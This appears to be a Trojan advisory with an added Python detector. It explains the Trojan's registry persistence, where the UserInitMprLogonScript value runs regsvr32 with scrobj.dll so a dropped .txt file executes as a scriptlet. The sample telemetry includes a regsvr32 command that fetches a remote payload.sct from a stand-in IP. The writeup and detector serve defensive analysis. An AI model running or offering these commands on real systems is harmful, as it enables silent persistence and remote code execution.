The Trojan may arrive via an email message containing a malicious attachment.
Once executed, the Trojan creates the following file:
- %AppData%\[RANDOM LETTERS].txt
The Trojan creates the following registry entries:
- HKEY_CURRENT_USER\Software\Microsoft\Notepad\"[USER NAME]" = "[RANDOM DATA]"
- HKEY_CURRENT_USER\Environment\"UserInitMprLogonScript" = "regsvr32.exe /s /n /u /i:"%AppData%\[RANDOM LETTERS].txt" scrobj.dll"
The second entry is the persistence mechanism: the UserInitMprLogonScript value is run by userinit.exe each time the user logs on, and the command it holds has regsvr32.exe load scrobj.dll with the dropped file as the /i: argument, which causes scrobj.dll to execute that file as a COM scriptlet regardless of its .txt extension. The /s, /n and /u switches keep the execution silent and avoid calling the usual registration export.
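The following is an added detection example, not code from the original writeup or from Symantec. It shows how the two indicators above translate into a check: a parser for the regsvr32 command line that flags scriptlet execution through scrobj.dll, applied both to the HKCU\Environment\UserInitMprLogonScript value and to process-creation records. The sample records, user name, random file name and the remote-URL variant are constructed for illustration; the URL case generalizes beyond the %AppData% file the writeup describes, since the same regsvr32 switches accept a remote scriptlet.

```python
import ntpath
import re

# Constructed sample telemetry (not from the original writeup). Record 1
# reproduces the Trojan's logon-script command line with a made-up user
# name and random file name; record 2 is a hypothetical remote variant.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s /n /u /i:"C:\Users\alice\AppData\Roaming\kqzpl.txt" scrobj.dll'},
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s /n /u /i:http://198.51.100.7/payload.sct scrobj.dll'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'notepad.exe C:\Users\alice\notes.txt'},
]

# A run of non-space characters and/or double-quoted segments is one token,
# so /i:"C:\path with spaces\x.txt" stays together.
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
URL_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)


def tokenize(cmdline):
    """Split a Windows command line and drop the quote characters."""
    return [t.replace('"', '') for t in TOKEN_RE.findall(cmdline) if t.replace('"', '')]


def analyze_regsvr32(cmdline):
    """Return a finding dict if the command line runs a scriptlet via
    regsvr32 + scrobj.dll, otherwise None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    if ntpath.basename(tokens[0]).lower() not in ("regsvr32", "regsvr32.exe"):
        return None
    args = tokens[1:]
    loads_scrobj = any(ntpath.basename(a).lower() == "scrobj.dll" for a in args)
    # /i:<string> is handed to DllInstall; for scrobj.dll it names the scriptlet.
    install_arg = next((a[3:] for a in args if a[:3].lower() in ("/i:", "-i:")), None)
    if not loads_scrobj or not install_arg:
        return None
    switches = {a.lower().replace("-", "/") for a in args
                if a[:1] in ("/", "-") and ":" not in a}
    is_url = URL_RE.match(install_arg) is not None
    ext = ntpath.splitext(install_arg)[1].lower()
    return {
        "scriptlet": install_arg,
        "remote": is_url,
        "in_appdata": "\\appdata\\" in install_arg.lower(),
        # A local scriptlet that is not a .sct file, e.g. the Trojan's .txt
        "disguised_extension": not is_url and ext != ".sct",
        "silent_no_register": "/s" in switches and "/n" in switches,
    }


def check_logon_script_value(value):
    """Classify the HKCU\\Environment\\UserInitMprLogonScript data.
    The value is rarely set legitimately, so anything non-empty is worth
    review; a scrobj.dll scriptlet launcher matches this Trojan."""
    if not value or not value.strip():
        return "absent"
    if analyze_regsvr32(value):
        return "scrobj_scriptlet"
    return "review"


def scan_events(events):
    """Return (index, finding) for each record that executes a scriptlet."""
    hits = []
    for i, ev in enumerate(events):
        finding = analyze_regsvr32(ev["cmdline"])
        if finding:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for i, finding in scan_events(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["image"], finding)
    print(check_logon_script_value(SAMPLE_EVENTS[1]["cmdline"]))
```

The benign regsvr32 registration in the first record does not match because it neither loads scrobj.dll nor passes an /i: string, which is the combination the detection keys on; the scriptlet path itself is not used as a signature, since it is random on every infection.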
Next, the Trojan checks internet connectivity by connecting to the following remote location:
The Trojan then opens a backdoor on the compromised computer and connects to the following remote locations:
The Trojan may then perform the following actions:
- Download and run executable files
- Download and run scripts
- Run individual commands
- Uninstall and delete itself
Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":